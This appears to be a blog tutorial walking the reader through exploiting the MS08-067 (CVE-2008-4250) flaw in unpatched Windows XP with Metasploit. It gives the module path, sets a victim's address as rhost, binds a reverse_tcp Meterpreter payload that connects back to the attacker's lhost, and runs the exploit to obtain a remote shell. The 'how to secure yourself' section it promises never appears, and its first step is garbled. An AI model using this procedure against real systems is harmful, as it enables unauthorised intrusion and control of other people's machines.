In this tutorial , we are going to discuss about very famous exploit of windows XP
and earlier versions MS08_067_netapi exploit
Queries to be solved in this post:How to gain access to unpatched Windows XP machine?How to launch this exploit using metasploit framework?
What does it exactly do?
How to secure yourself?
About Exploit :
The original name of exploit is Microsoft Server Service Relative Path Stack corruption. A remote user can send a specially crafter RPC request that triggers the overflow during path canonicalization and can execute arbitrary code on the target system.
CVE – ID : CVE-2008-4250
the latest version of Metasploit Framework
on windows XP
or on Backtrack
2) Open Metasploit
3) Type Show Exploits
– This command will print the names and little descript
ion of all the exploits in your metasploit
4) Then search for the exploit named ms08_067_netapi. The actual name differs in different version of metasploit
, so u can also use search command to search this exploit.
Type Search smb exploit
: this will print all SMB exploits, search for the one we want.
5) The type use windows/smb/ms08_067_netapi
[USE pathoftheexploit |thiswindows/smb/ms08_067_netapi
is the path of our exploit] in the console.
6) You can then type Show options
, this will print all the options available for that exploit.
7) Now you need to configure your exploit to attack the target machine.
7.1) Type Set rhost victimipaddress
[ Rhost refers to ip address of the victim, example : set rhost 192.168.1.22
. Here 192.168.1.22 is the address of the victim’s machine.]
7.2) Type set payload windows/meterpreter/reverse_tcp .
This command will bind the payload reverse_tcp
with our exploit. So what is a payload actually?
Let me clear your query!Payload
: Payload is the shellcode/assembly code/commands to be executed on the target machine once our exploit has gained access on the target machine.
Suppose your exploit is successfully executed on target machine, your payload will then tell it what to do after that!
reverse_tcp payload will open a reverse connection and will give you a metrepretter
session and then you can do what ever you want.
You can also choose some different payload by typing show payloads
, this command will print all the available payloads choose any and use the payload with command use payload payloadpath
7.3) set lhost yourownipaddress – Use this command to set local host address, the address on which the exploit will backconnect with. Set your own ip address here.
8) Now last step: type exploit and the exploit will execute and if the machine is not pathched, you will get a remote shell connection with the target machine and then you can then do whatever you want.
Note: You will get a remote connection in this case where payload selected is reverse_tcp. The result will vary according to the payload selected.